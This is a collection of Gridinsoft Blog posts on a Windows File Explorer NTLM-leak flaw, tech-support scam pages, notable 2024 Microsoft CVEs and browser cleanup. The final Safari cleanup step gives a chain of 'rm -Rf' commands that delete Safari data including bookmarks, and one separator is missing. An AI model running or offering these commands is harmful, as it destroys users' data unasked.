Microsoft – Gridinsoft Blog

CVE-2025-24071 Windows File Explorer Spoofing Vulnerability Uncovered, Patch Now

Stephanie Adlam — Thu, 20 Mar 2025 11:18:02 +0000

Microsoft uncovered the information about a critical vulnerability in Windows File Explorer, CVE-2025-24071, with a CVSS score of 7.5. It allows attackers to leak NTLM hashes, which can be used for further attacks like pass-the-hash or offline cracking. The vulnerability has now been fixed by Microsoft.

CVE-2025-24071 Windows File Explorer Spoofing Vulnerability Overview

Cybersecurity agencies have published information about the CVE-2025-24071 vulnerability. This is a critical vulnerability in Windows File Explorer, with a CVSS score of 7.5. It affects multiple versions of Windows, including Windows 10, Windows 11, and various Windows Server versions. The vulnerability arises from Windows Explorer’s implicit trust and automatic parsing of .library-ms files, which are XML-based files used to define search or library locations within the operating system.

CVE-2025-24071 details

The core issue is that when a .library-ms file, crafted with a malicious SMB (Server Message Block) path, is embedded in a RAR or ZIP archive and subsequently extracted, Windows Explorer automatically processes it for indexing, previews, or thumbnails.

This processing triggers an SMB authentication request to the attacker-controlled server, resulting in the disclosure of the user’s NTLMv2 hash. This hash can then be used for attacks such as pass-the-hash or offline NTLM hash cracking, posing significant security risks.

Technical Details

The PoC for CVE-2025-24071 has been released for educational purposes only and is publicly available on GitHub in the eponymous repository, created by a malware and CTI analyst known as 0x6rss. The PoC is implemented as a Python script, designed to demonstrate the exploitation process. The PoC involves creating a specially crafted .library-ms file that includes a tag pointing to an attacker-controlled SMB server (e.g., \\192.168.1.116\shared). This file is compressed within a RAR or ZIP archive.

Contents of the .library-ms file used to reproduce the CVE-2025-24071 vulnerability (source: 0x6rss)

Upon extraction of the archive, Windows Explorer automatically initiates processing of the .library-ms file. This is observed through tools like Procmon, where processes such as Explorer.exe and SearchProtocolHost.exe perform operations like CreateFile, ReadFile, QueryBasicInformationFile, and CloseFile for indexing purposes.

The automatic processing triggers an SMB authentication handshake, captured via Wireshark with an SMB filter (smb or smb2). This includes an SMB2 Negotiate Protocol Request from the victim to the attacker server, followed by an SMB2 Session Setup Request (NTLMSSP_AUTH), which leaks the victim’s NTLMv2 hash. The key feature of this vulnerability is that no user interaction is required beyond extracting the archive, making this a zero-click exploit in certain scenarios.

Exploitation in the Wild and Microsoft Response

Research suggests that CVE-2025-24071 is not only theoretical but actively exploited in the wild. In the aforementioned blog, the author reports that the vulnerability may have been sold on a forum by a threat actor named “Krypt0n,” known for developing EncryptHub Stealer. An X post further corroborates this, detailing how the exploit is configured on a local server (e.g., VPS) with the attacker’s IP and share, triggering hash leaks when accessed by Explorer without file opening.

Microsoft has addressed this vulnerability in the March 2025 Patch Tuesday update, released earlier this month. The patch details are referenced in the Microsoft Security Update Guide. Users of vulnerable systems are advised to upgrade to an up-to-date version of the OS.

The post CVE-2025-24071 Windows File Explorer Spoofing Vulnerability Uncovered, Patch Now appeared first on Gridinsoft Blog.

Microsoft Account Locked

Stephanie Adlam — Wed, 12 Mar 2025 08:15:46 +0000

The “Microsoft Account Locked” scam is a deceptive tech support fraud. Users receive pop-up messages falsely claiming their Microsoft account is locked due to suspicious or illegal activities, such as money laundering. These pop-ups, not affiliated with Microsoft, urge users to call a provided toll-free number, connecting them to scammers posing as Microsoft technicians. In this post, we will analyze this scam in more detail, and I will also give some recommendations on security and how to avoid falling victim to this scam.

“Microsoft Account Locked” scam Overview

The “Microsoft Account Locked” scam is classified as a tech support scam, a form of phishing and social engineering fraud. It targets users by displaying messages falsely claiming their Microsoft account has been locked. These messages allege detected illegal activities, such as money laundering. Foremost, this scam is not associated with Microsoft and is designed to deceive users. Its intent is to trick victims into contacting scammers, leading to potential financial losses, identity theft, and system infections.

“Microsoft Account Locked” fake page

The scam poses a medium damage level, with impacts including loss of sensitive private information, monetary loss, and possible malware infections. The scam’s distribution methods include compromised websites, rogue online pop-up ads, and potentially unwanted applications. Recent data, as of March 2025, indicates its continued relevance, with variations observed in messaging and delivery.

How the Scam Operates

The scam operates through several carefully planned stages that exploit both user trust and technical vulnerabilities. It starts with a pop-up message appearing on the victim’s screen, usually triggered by visiting compromised websites or clicking rogue ads.

The page redirects the user to an alert that Microsoft Account Locked.

The messagemight claim, “Your Microsoft account has been locked due to detected illegal activity,” and originate from domains like mshelp.netlify[.]app. The associated IP address (34.234.106.80) currently has no detections on VirusTotal. These pop-ups are crafted to resemble legitimate Microsoft alerts, using branding and urgent language to create a sense of panic.

“Microsoft Account Locked” running full screen and playing scary sounds.

When users attempt to “unlock” their accounts, they are redirected to another pop-up instructing them to call a supposed “Emergency Assistance” number, such as 18333982352. This number is not affiliated with Microsoft and serves as a key indicator of the scam. If the user calls, scammers posing as Microsoft-certified technicians use social engineering tactics to build trust. They claim they need personal details or remote access to “fix” the issue, leveraging fear and urgency to manipulate the victim.

Once granted remote access – often via legitimate tools like TeamViewer or UltraViewer – scammers can engage in a range of malicious activities. They may steal login credentials, personal information, and financial data. They might install malware, including trojans, ransomware, or cryptominers, further compromising the system.

In some cases, they run fake antivirus scans that report non-existent threats, pressuring users into purchasing fraudulent software. Financial exploitation is also common. Scammers demand payments via hard-to-trace methods like gift cards, cash, or cryptocurrency, leading to direct monetary loss.

The scam spreads through multiple channels to maximize its reach. One method involves compromised websites that have been hacked to display malicious pop-ups. Another common tactic is rogue online pop-up ads, which are served through malvertising networks and can appear even on legitimate websites. Additionally, the scam can be delivered via potentially unwanted applications (PUAs), which may install adware that triggers fraudulent pop-ups.

There are multiple variants of this scam, each using slightly different messaging. For example, one version warns, “YOUR COMPUTER HAS BEEN BLOCKED”, and in the same post we explain how this scam works on the technical side.

Red Flags and Detection

First and foremost red flag – these notifications appear in the web browser. Let me make one thing clear – the website technically does not have the ability to scan your device for viruses or system errors. There are exceptions when the official website has a feature to automatically install/update drivers, but this works only if the official utility from the developer is installed on the system. Essentially, in this case, the website is part of the utility’s interface. In all other cases, if a third-party site shows a notification that errors have been detected in the system, it is a guaranteed scam.

So, let’s summarize: Recognizing this scam involves spotting several key red flags. Unsolicited pop-ups claiming account or system issues – especially those appearing without any user action. Another warning sign is the presence of a phone number in the pop-up. Legitimate companies like Microsoft do not display support numbers this way; their official contacts are only available on their official website.

Scammers also use high-pressure tactics, urging victims to call immediately or warning that their account will be permanently locked. Messages often contain grammatical errors or awkward phrasing, a common trait of scam communications. Additionally, scammers frequently request remote access via software like TeamViewer, which, while legitimate, is exploited in these schemes.

How To Stay Safe?

To protect against this scam, users should take several key precautions. Always verify the authenticity of messages or pop-ups by checking Microsoft’s official support page or contacting support through verified channels like their official website or app. Never call phone numbers provided in pop-ups; instead, look up Microsoft’s official contact information independently. You may want to consider using special tools to identify your phone number.

Anti-spam services identify this number as potentially dangerous.

Avoid granting remote access to your computer unless you initiated the request and are certain it’s from a legitimate source, such as Microsoft’s official support. Keeping your operating system and software updated helps protect against vulnerabilities that scammers exploit through compromised websites. Just remember, official tech support NEVER requests remote access to resolve system issues.

The post Microsoft Account Locked appeared first on Gridinsoft Blog.

Windows Defender Security Center Scam

Stephanie Adlam — Sat, 01 Feb 2025 09:39:19 +0000

“Windows Defender Security Center” is a scam message that comes from a fake website. This fraud is built on the inexperience and trust of Internet users. Now I will tell you how it works and how not to become a victim of it.

Windows Defender Security Center Scam Overview

“Windows Defender Security Center” is a fake malware alert that appears on various scam websites. Users often land on these pages unintentionally, while browsing other websites. In certain cases, a browser hijacker may be responsible. Such viruses have leading users to sketchy pages as their main target, and scams is just another destination.

Example of the “Windows Defender Security Center” scam

The scheme is simple: the fake alert warns the victim, that its system is infected with multiple viruses. It urges calling a provided number, which typically connects the victim to a call center, usually in another country.

There, scammers insist that the computer is severely compromised and offer a «solution». They ask the victim to install a potentially an app, that will resolve the problem. But instead of a solution, users get an unwanted application (PUA). Once installed, this software runs a fake scan, detects non-existent threats, and demands payment for an “activation” that does nothing.

How Windows Defender Security Scam Operates?

First part of the scam takes place on a website that pretends being a Microsoft malware alert notification of some kind. It is quite easy to get one opened in the background tab while browsing sketchy websites with pirated movies or games. The title of the website – Windows Defender Security Center – is what has given the scam campaign the name.

When an unsuspecting user clicks anything on that website, it extends into a fullscreen mode, and starts playing a scary AI-generated voice message. It states something along the lines of “your computer is infected and we locked it to stop the malware, contact our support immediately”. The exact text may change from one scam site to another, but the overall story is always the same.

One trick that this site pulls out is the altered out-from-fullscreen key sequence. F11 or short Esc button pressing do nothing, as con actors who designed that page changed it to long Esc press. And that is a way to get out of that scam with no calls to a “tech support”.

Crooks posing as “Microsoft-certified technicians” instruct victims to grant remote access, pretending to diagnose issues. In reality, they plant additional junkware, modify system settings, and pressure users into paying for unnecessary services.

Example of a program that is getting installed by Windows Defender Security Center scam technicians

These programs frequently display fake security warnings, convincing users that urgent action is necessary. After running a sham system scan, the software presents a long list of supposed infections. However, the “free” version conveniently cannot remove them. Apps push the victims to purchase the full version, which merely clears the list — without providing any real protection or optimization.

The program asks to buy full version to resolve problems

To make matters worse, scam websites often employ browser-locking scripts, preventing users from closing the page. PUPs also are notorious for injecting aggressive advertisements – pop-ups, banners, and in-text ads – disrupting the browsing experience and sometimes covering legitimate website content. These ads can lead to malware-laden pages or execute drive-by downloads, silently installing additional threats. Even a single misclick can result in severe infections.

Another critical concern is data tracking. Many PUPs harvest user information, including IP addresses, search history, visited websites, and in some cases even keystrokes. However, the last one characterizes the threat of the other type – spyware. In any case, this data is sold to third parties, potentially leading to privacy breaches, targeted phishing attacks, or even identity theft. Some PUPs go further by mining cryptocurrency or running background processes, significantly degrading system performance.

How Do PUPs Infiltrate the System?

Many PUPs get into the computer without explicit user consent, often bundled with freeware or delivered via misleading ads. While some PUPs have official websites, most spread through deceptive methods. Developers rely on “bundling” — hiding unwanted programs inside installation packages of legitimate software.

Since many users rush through installations without reviewing options, they unknowingly allow PUPs onto their systems. These unwanted programs are often concealed within “Custom” or “Advanced” installation settings, which many users overlook. Intrusive ads also play a role, redirecting users to sites offering fake downloads or deceptive prompts, leading to unintentional PUP installations.

How to Prevent PUP Infections?

To minimize the risk of PUP infections, users must adopt cautious browsing habits. This is especially important when visiting streaming, gambling, or adult content websites. Downloading software should be done exclusively from official sources, as third-party downloaders often distribute bundled PUPs. When installing software, reviewing the “Custom” or “Advanced” settings is crucial to opting out of any hidden programs. If a browser starts redirecting unexpectedly, users should inspect and remove suspicious extensions or applications that may have been installed without their knowledge.

As I said above, scammers rely on social engineering to manipulate users into falling for their schemes. Fraudulent pop-ups often feature spelling mistakes and poor design, making them appear unprofessional. They also employ urgency tactics, such as countdown timers, to pressure users into taking immediate action.

Claims that users have won a prize, despite never entering a contest, are another red flag. Additionally, pop-ups that appear to scan a device for viruses are always fraudulent, as webpages cannot perform such actions. Finally, any pop-up offering an exclusive financial opportunity only for the user is a clear scam attempt.

While most pop-ups do not directly install malware, they can still lead to financial loss or identity theft. Sometimes they can prevent to close web browser. If this happens, the one way to terminate the browser is to use Task Manager or restart the system by physical button on pc/laptop. Upon reopening the browser, avoid restoring the previous session to prevent reloading the malicious page.

The post Windows Defender Security Center Scam appeared first on Gridinsoft Blog.

Azurestaticapps.net

Stephanie Adlam — Mon, 07 Oct 2024 15:30:45 +0000

Azurestaticapps.net is a selection of pages registered on genuine Microsoft hosting, that try scaring the user by false malware infection claims. In fact, it is nothing but intimidation that ends up with a call to fake tech support, that eventually steals personal information or installs unwanted software. In this post, I will debunk all the elements of that fraudulent site, and explain how to avoid them in future.

Azurestaticapps.net Scam Website Overview

As I’ve mentioned in the introduction, Azurestaticapps.net is not about a sole page, but rather a whole network of scam sites, operated by the same group of fraudulent actors. They use genuine Microsoft Azure hosting as a way to get better disguise and organize the operations. All of them designed for making users believe their system is infected with viruses, and Microsoft thus locked the computer and now asks to contact their hotline. Here is how it typically looks:

Typical appearance of Azurestaticapps.net scam site

To make the victim believe everything is real, scammers not only parody the visual style of Microsoft sites, but also launch a scary robotic voice message that repeats the content of the banner. Once you click the site, it extends into a full screen mode and blocks all the typical ways out, including pressing the Esc button. This is what creates the sense that there’s no way out, pushing the victim to follow the instructions from the banner.

Not sure whether you can trust the site? Consider scanning it on our free online website checker! It goes through the entire website, checking its contents’ safety by a selection of parameters. Just 15 seconds – and you will know exactly whether the website is trustworthy.

And these instructions are what leads the user to the main part of the scam – a call to a pseudo tech support. The specified number differs from one site to another, but they are essentially the same: a US number that redirects the call to a scam call center somewhere in India or another Asian country. There is a whole infrastructure built around these fake support scams, that was at one point disrupted by the FBI, but fraudulent activity is back up again.

Azurestaticapps.net Fake Tech Support Contact

People that pretend to be tech support agents of Microsoft in fact work with one single purpose: force the user into installing questionable software. They will either instruct the caller to install a “fix tool” by themselves or ask for providing them remote access to the system to do this by themselves. As a result, the user ends up with a non-existent problem solved and a dodgy program running in their system.

The key danger of all this is, in fact, not only forcing users into this call by fake alerts, but this program that gets installed in the end. They range from fake antiviruses to “system tweakers” that can cripple system stability and performance, and quite often dare to ask to buy a license to keep using them. Fake support and the Azurestaticapps.net sites are, in fact, the main ways for such applications to propagate to user systems.

How did I get to the Azurestaticapps.net?

As you may already guess, you won’t typically get to sites like Azurestaticapps.net in a normal way, i.e. through search results or regular links on other sites. Instead, they rely on spontaneous redirects from shady websites, particularly ones that have illegal content of some sort. Cracked games and programs, pirated movies, cheats or some strange game mods – offerings like this are quite often synonymous with a fishy site with redirects or outright malware.

In certain cases, fake virus alarm pages are getting opened because of adware activity. Typical signs of this situation include repeated appearance of this or similar scams in absence of any user interaction. In simple words, if strange things happen with your browser or system, while you are not doing anything, that may be the sign of malware presence.

Scan your system for malware

The best way to clear things up is to use a dedicated security software. GridinSoft Anti-Malware will check the entire system and delete all the detected malicious programs. A Full Scan will be the best option for that case: this way, the program will check even the most remote folders, down to system configuration files.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

Download Anti-Malware

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Azurestaticapps.net appeared first on Gridinsoft Blog.

Top 3 Vulnerabilities of 2024: How to Block and Prevent

Stephanie Adlam — Sun, 15 Sep 2024 18:14:59 +0000

Any successful remote cyberattack starts with penetration of the target network. Regardless of the type of threat (spyware, ransomware, or infostealer), first it must be delivered before it can be deployed. Attackers use a variety of methods and tools to accomplish this. Some of them require some action on the part of the individual. Others, in turn, rely on vulnerabilities in the system and can be delivered and deployed without the victim’s involvement.

Top Vulnerabilities in 2024

From quite a few vulnerabilities that surfaced in 8 months of 2024, there are several that created significant fuss in the cybersecurity community. Key sign of the significance is, of course, the number of systems that may be impacted. Though, I won’t ignore other factors, like ease of exploitation and severity of possible consequences.

How Do Vulnerabilities Works?

There may also be a confusion on whether the flaw should be considered “top” or not depending on the frequency of its exploitation in cyberattacks. As some of the flaws keep circulating years after the initial discovery, you can sometimes see ratings that include those “past” vulnerabilities. For certain years, these overdue weaknesses were dominant, despite all the vulnerabilities discovered the same year. In this article, I will concentrate exclusively on ones discovered in 2024, with all the other mentioned characteristics in mind.

Critical RCE Threat in Windows TCP/IP Stack

CVE-2024-38063 is a critical vulnerability in Windows 10/11 that allows remote code execution (RCE) via IPv6 packets. The vulnerability is rated CVSS 9.8 and affects Windows 10, Windows 11 and Windows Server 2008-2022. Security researcher Marcus Hutchins has published a detailed analysis of the vulnerability. He also noted that this vulnerability affects one of the most exposed parts of the Windows kernel, the tcpip.sys driver, which is responsible for processing TCP/IP packets. In other words, attackers can exploit this vulnerability by sending specially crafted IPv6 packets to the target machine, allowing RCE without user interaction.

For potential risks, if successful, attackers could gain access at the SYSTEM level. This eventually allows them to execute arbitrary code on the vulnerable system and compromise sensitive data. The former, in turn, is a classic way to deploy malware in cyberattacks of different grades. Microsoft has released the update and strongly recommends applying it as soon as possible. For ones who cannot apply the patch, Redmond recommends disabling IPv6 until the update becomes available in order to reduce the attack surface.

Fortunately, there were no exploitation cases known to the moment. But the fact that the vulnerability exposes individual users and corporations alike makes it worth keeping in mind and fixing when the opportunity arises.

Critical Remote Code Execution in Microsoft Project

Vulnerability CVE-2024-38189 is a critical remote code execution vulnerability that affects some Microsoft products. It affects Windows 10 and Windows Server 2019 and later, as well as various versions of Office, including Office 365. CVSS score of 8.8 clearly characterizes how much damage the attackers can do with this flaw. Unlike the previous vulnerability, exploiting CVE-2024-38189 requires user interaction, namely the attacker must convince the victim to open a special Microsoft Project file. However, in the era of Dark LLM-generated phishing emails, this will not be a problem for attackers.

The results of successful exploitation of this vulnerability are clear – remote access with privilege escalation. It can lead to data leakage and full control over the infected system, with potentially severe consequences. Microsoft has released an update, so the only task for users is to apply the update and pay attention to monitoring suspicious network activity. And with the vulnerability being actively exploited in the wild, this update should not be hesitated with.

RCE Flaw in Microsoft Exchange

The third vulnerability is CVE-2024-38178, which has a CVSS score of 7.5 and allows remote code execution attacks under certain conditions. Although this is a specific vulnerability, it poses a significant threat. Similar to the previous point, exploitation of this vulnerability requires an authenticated client to be tricked into clicking a malicious link. Moreover, the exploitation also requires the victim to use Microsoft Edge in Internet Explorer mode. However, South Korea’s National Cyber Security Center has reported that this vulnerability was potentially used in a state-sponsored APT attack.

The vulnerability arises from a flaw in web content processing, leading to remote code execution. This could result in unauthorized server control, data leaks, and significant server disruption. The attacker does not require direct access to the server, relying instead on tricking users. To ensure security, users should update their systems and consider disabling Internet Explorer mode in Microsoft Edge.

What Causes the Vulnerabilities to Appear?

Typical reasons for vulnerabilities to appear in programs is a bad software engineering, technology aging, software misusage, or all of them together. It is hard to trace the reason for each and every specific vulnerability, especially considering the sheer number of them. But it is obvious that the more complex the program is – the easier it is for something inside to broke, or be broken on purpose.

Make sure your system is up to date

The worst part about it is that you can’t really do anything to prevent the vulnerabilities from appearing (if you are not the developer of course). For users, and even corporations, the only way to secure themselves against negative consequences of vulnerability exploitation is to install all the recent updates. And even this won’t always be a guarantee of having no zero-day flaws.

How to prevent vulnerabilities?

To summarize, let me make a few recommendations to help reduce the likelihood of successful exploitation of vulnerabilities:

Install the latest updates. Proper software developers releases flaw fixes as part of their regular updates, and I strongly recommend not to ignore them. If it happens for you to use an end-of-service program, it is better to update to the newest version or seek for an alternative that still gets software updates. “Unsupported” does not mean “free of vulnerabilities”!
Use software from reliable developers. While vulnerabilities can appear in any software, from any developer, the likelyhood of this happening is much higher when you stick to solutions of no-name dev team. Large and renowned developers, aside from doing thorough testing, will also provide all the needed support and updates for their software.
Keep an eye on security news. Companies sometimes struggle with notifying their users in a timely manner. By checking out newsletters, you ensure being up to date about the recent flaws or attacks.

The post Top 3 Vulnerabilities of 2024: How to Block and Prevent appeared first on Gridinsoft Blog.

Ads(exe).finacetrack(2).dll Virus Explained

Stephanie Adlam — Tue, 10 Sep 2024 10:16:01 +0000

Ads(exe).finacetrack(2).dll is a detection name that you can see on websites pretending to be malware infection alerts from Microsoft. Such pages appear all of a sudden, blocking user inputs and displaying a scary message, duplicated with a robotic voice message in the background. The site eventually asks the user to call a “tech support” to solve the alleged malware problem.

Such sites are a part of a huge network of “fake tech support” web pages. They pretend to be official Microsoft sites, notifying people about “severe malware infections” present in the system. In fact, all that is happening is one big fiction. In this article, I explain how these sites operate, why they open in your browser, and how to stop that for good.

What is Ads(exe).finacetrack(2).dll?

Ads(exe).finacetrack(2).dll is a detection name for an alleged malicious program running in the system. It appears on a fake Microsoft website, at least its authors tried to make it look like one. On the top layer banner that says the system is blocked for security reasons. That exact banner also contains the phone number of a “tech support” that the one should call to fix the issue.

Typical appearance of the Ads(exe).finacetrack(2).dll scam page

The website itself is designed in a rather specific way. Once the user who gets to this site clicks on any of its elements, it will scale to full screen, and start playing a scary voice message:

Click to see voice message transciption

Important security message.
Your computer has been locked up. Your IP address was used without your knowledge or consent to visit websites that contain identity theft virus.
To unlock the computer, please call support immediately.
Please do not attempt to shut down or restart your computer. Doing that may lead to data loss and identity theft. The computer lock is aimed to stop illegal activity. Please call our support immediately.

Following that switch, any of the keyboard combinations stop working (yes, even Alt+F4 and Ctrl+Alt+Del). The reason for this is the internal mechanisms of the site that intercept these combos before the system can handle them. As a result, the user feels trapped inside, with no way out other than following the guidance from the banner.

Still, there is a simple trick to get out of such a scam site. If you click Esc button several times, your browser will show you a pop-up window saying to hold down Esc to get out of full screen mode. That is different from a singular click on the button, and is probably yet another trick from the website. And that is it – hold it down, and then just close the window with the malicious website as you usually do.

How does this scam work?

Fake tech supports scam, including the Ads(exe).finacetrack(2).dll, operate in several steps. They need to get the user to a scam page, make them follow the instructions and force them to allow the support to do their “job”. The latter typically results in the installation of unwanted programs, often so-called scareware. Let’s get through each of these steps.

Beginning

Initially, scammers need to make the user open the scam website. As these pages typically sit on some obscure URL, it is not an option to hope for any organic traffic to come by. What they do instead is buying redirect link placement on shady websites with content that, in turn, attracts a lot of users. Sites with pirated films, dodgy online dating services, resources that offer cheats for popular games or shady hacking activities – such places never disdain an illegal source of profit. Any click on any content on these sites may redirect the user to a tech support scam page. Though, other scams appear on such sites as well, so it is a bad idea to keep using them.

Not sure whether you can trust a website? Consider scanning it with our website reputation checker! In less than a minute, it will give you the clear insight whether the site is trustworthy.

Culmination

After the user gets to the website, its inner mechanisms of the Ads(exe).finacetrack(2).dll site lock them on the page. Blocking any visible way out makes it particularly difficult for the user to avoid panicking, especially for someone with less computer skills. As a result, the only option that appears viable is to call the “support” by the specified number.

The Finale

In the final stage, on the call with the fake tech support manager, the victim gets the instructions to install a remote access tool, usually a TeamViewer. After that, the fraudster on the phone instructs to give them access to the system. Upon taking control of the victim’s machine, the scammer typically downloads a bunch of unwanted applications. Fake browser security apps, questionable antivirus software no one ever heard about, driver updating utilities – plenty of them.

Such applications will further spam the user, reminding them about the “dangerous viruses” and asking to buy a license. Sure enough, it is nowhere near as dangerous as malware, but still quite annoying and can easily lead to money loss. Also, since such apps are not tested properly, some of their actions can make the system malfunction.

How to Avoid the Ads(exe).finacetrack(2).dll scam?

As such scams typically propagate through sites with shady content – pirated movies and programs, dating or adult websites, the best way to prevent fake support scams from appearing will be to avoid such sites in future. Overall, their content is illegal and unhealthy; they typically have massive amounts of ads that can expose the visitor to even more dangers. If you are not sure whether the site is safe to use, check it with our free online URL scanner service.

Another part of the advice is to have a clear understanding of how Windows operates in general. Microsoft never blocks someone’s system, and never displays any notifications in the browser. Even if there is malware running in the computer, you will only get a message from Microsoft Defender, and that is it. Any attempt to look like a genuine Microsoft website, especially with such an obscure URL, is a giant red flag.

Finally, I will advise you to run a proper anti-malware application, like GridinSoft Anti-Malware. It will reliably protect you against malicious programs, and will also block any malicious sites, thanks to its Online Protection feature.

The post Ads(exe).finacetrack(2).dll Virus Explained appeared first on Gridinsoft Blog.

Microsoft Fixes 3 Critical Vulnerabilities in July Patch Tuesday, One Exploited

Stephanie Adlam — Thu, 11 Jul 2024 10:37:00 +0000

Microsoft has released its monthly security update, addressing 142 vulnerabilities across its product suite and software. One of these vulnerabilities is already being exploited in the wild. The vulnerabilities were fixed as part of Microsoft’s monthly bug fix release, widely known as “Patch Tuesday”.

Microsoft Fixed 3 Critical Flaws in Patch Tuesday

In the most recent Patch Tuesday, on July 10, 2024, Microsoft released fixes for 142 security issues in its product suite and software. Among them are 6 flaws of different severity – CVE-2024-38023, CVE-2024-38060, CVE-2024-38080 and RCE bugs CVE-2024-38074, CVE-2024-38076, and CVE-2024-38077. The latter three have a CVSS score of 9.8 and allow an attacker to send specially crafted network packets that could trigger remote code execution in the Windows Remote Desktop Licensing service. Moreover, the last vulnerability does not require authentication, making it particularly dangerous.

Windows Updates menu

Notably, this is the largest list of fixes in recent months, nearly matching the April patch release where Microsoft fixed 150 vulnerabilities. The patches address vulnerabilities affecting multiple segments of Microsoft products. These include Windows, Office, Azure, .NET, Visual Studio, SQL Server, and Windows Hyper-V. In particular, one of the vulnerabilities is already being actively exploited in real-world attacks.

CVE-2024-38074, 38076, and 38077 Details

Despite all of the RCE flaws being rated at CVSS 9.8, some of them require authenticated access or specific privileges to exploit. For instance, a vulnerability in Microsoft SharePoint Server requires site owner rights to execute arbitrary code. One of the most significant vulnerabilities is an issue in Windows Hyper-V, which allows attackers to gain system privileges. To understand the severity of these vulnerabilities, let’s delve into the details.

CVE-2024-38023 vulnerability allows attackers with site owner rights in Microsoft SharePoint Server to execute arbitrary code on the server. An attacker with the necessary privileges can use specially crafted commands to execute code in the context of SharePoint Server. This vulnerability is particularly dangerous because it can lead to complete control over the server and leakage of confidential information.

Another remote code execution vulnerability (CVE-2024-38060) stems from the flaw in Microsoft Windows codec library. It allows an attacker to upload a specially crafted TIFF file, which, when processed by the system, will trigger arbitrary code execution. However, to exploit this vulnerability, the attacker must have access to the system, making it less dangerous than remote attacks, but still posing a significant risk.

The third vulnerability, CVE-2024-38080, is already actively exploited in real-world attacks. Attackers can use this vulnerability to escalate privileges in Windows Hyper-V, gaining access to system-level privileges. This can lead to complete control over virtualized environments, posing a serious threat to the security and integrity of the systems.

How to Stay Safe?

Vulnerabilities are an inherent part of software — past, present, and future. The only effective method to mitigate their risks is timely patching. To minimize these risks, Microsoft strongly recommends promptly installing the latest updates that address these vulnerabilities. And, well, despite the fact that Redmond tries its best to fix all the known flaws in time, there may be slip-throughs, even ones that exist for over a year.

Another layer of protection against exploitation is a zero-trust anti-malware solution. Not much are available for home users, but vulnerability exploitation typically targets systems from corporate networks to begin with. A sturdy solution that will do a thorough check to every action from any software, which is the essence of zero trust policy, is what has the best efficiency against such attacks.

The post Microsoft Fixes 3 Critical Vulnerabilities in July Patch Tuesday, One Exploited appeared first on Gridinsoft Blog.

Windows Defender Security Warning

Stephanie Adlam — Tue, 02 Jul 2024 09:14:36 +0000

Have you ever encountered a Windows Defender security warning pop-up while browsing? This type of malicious activity is designed to trick you into contacting scammers. Fortunately, you can quickly get rid of it. Here, we will explain how to remove this scam and protect yourself from other viruses.

What is the Windows Defender Security Warning?

This warning is the result of scareware or a phishing scam. Its purpose is to redirect you to a webpage that visually resembles the official Microsoft website. However, the URL does not match the official site. The page may display a message claiming that your computer is infected with malware and that you need to contact a support agent by phone to fix the problem.

Windows Defender Security Warning scam example. Red flags are highlighted in the picture.

Unfortunately, the notification looks like a legitimate Windows message, making it especially dangerous – many users may not even attempt to verify i= on Google. Scammers commonly make the pop-up as convincing as possible so that people don’t suspect anything is wrong. The provided phone number will likely connect you to a fraudulent call center. The agent may try to get you to install malware to infect your computer, steal your personal information, or demand money for fake services.

Why is the Windows Defender Security Warning False?

At first glance, you might mistake this for a legitimate warning from Windows Defender. However, if you’re familiar with Windows Defender, you’ll notice differences from a genuine notification. Therefore, please do not call the phone number provided in the window because it is not a real alert. Here’s why:

It’s not the Windows Defender interface. Windows Defender, also known as Windows Security, is a built-in Windows application with a different interface. It will never display a browser pop-up or webpage; it uses system notifications instead.
Strange text and typos. A banner or page showing a Microsoft Defender alert often contains strange text designs and grammatical and stylistic errors, which sharply contrast with the short and informative Defender notifications.
Microsoft never provides contact numbers for users. Users can contact Microsoft support through the “Get Help” application if they encounter problems.

This Windows Defender security alert is flawed in both format and content. It’s often a low-level phishing scam aiming to sell a rogue antivirus service, which can harm your computer. In some cases, you might not be able to close the alert or switch to other applications.

Causes of the Windows Defender Security Warning

There are several reasons why you might see a Windows Defender security warning. Here are the most common ones:

You clicked on an ad that redirected you to a fake site.
You visited a hacked website that redirected you to a fraudulent page.
You have a malicious program installed on your device, often a result of adware activity.

There are also many other ways you could be exposed to fraud, depending on various factors, such as the external devices you share with others. Simply closing the window may not solve the problem, especially if adware is causing it. The pop-up message may appear every time you open your browser.

How to Remove the Windows Defender Security Warning

Since the Windows Defender security warning appears in your browser, most actions to get rid of it are related to your browser. These steps can help resolve the issue of Windows Defender security warning pop-ups:

Force close and reopen your browser.
If the problem with redirecting to a fraudulent page persists, reset your browser (instructions below) or reinstall the browser completely.
If this continues, you may have adware or a PUP (potentially unwanted program) installed on your computer, and you need to remove it.

If you’re unsure which installed application is causing the pop-up notifications, install antivirus software to detect and remove the infection from your computer.

How to Clear the Browser from the Windows Defender Security Warning

Resetting your browser settings is one of the first steps to eliminate the Windows Defender security warning scam. Here are the instructions for different browsers:

Remove the Windows Defender Scam from Chrome

Click on the three vertical … in the top right corner and Select Settings.
Select Reset and Clean up and Restore settings to their originals defaults.
Click Reset settings.

Remove the Windows Defender Scam from Firefox

Click the three-line icon in the upper right corner and select Help
Select More Troubleshooting Information
Select Refresh Firefox… then Refresh Firefox

Remove the Windows Defender Scam from Microsoft Edge

Press the three dots
Select Settings
Click Reset Settings, then Click Restore settings to their default vaues.

Remove the Windows Defender Scam from Safari

Open the terminal (press ⌘ Command + Spacebar to open the spotlight, type “terminal” and press “Enter”)
Enter these commands one at a time. Execute each command by pressing “Enter” after copying it into the terminal:

rm -Rf ~/Library/Caches/Metadata/Safari; rm -Rf ~/Library/Caches/com.apple.Safari; rm -Rf ~/Library/Caches/com.apple.WebKit.PluginProcess; rm -Rf ~/Library/Preferences/Apple\ -\ Safari\ -\ Safari\ Extensions\ Gallery rm -Rf ~/Library/Preferences/com.apple.Safari.LSSharedFileList.plist; rm -Rf ~/Library/Preferences/com.apple.Safari.RSS.plist; rm -Rf ~/Library/Preferences/com.apple.Safari.plist; rm -Rf ~/Library/Preferences/com.apple.WebFoundation.plist; rm -Rf ~/Library/Preferences/com.apple.WebKit.PluginHost.plist; rm -Rf ~/Library/Preferences/com.apple.WebKit.PluginProcess.plist; rm -Rf ~/Library/PubSub/Database; rm -Rf ~/Library/Safari/*; rm -Rf ~/Library/Safari/Bookmarks.plist; rm -Rf ~/Library/Saved\ Application\ State/com.apple.Safari.savedState;

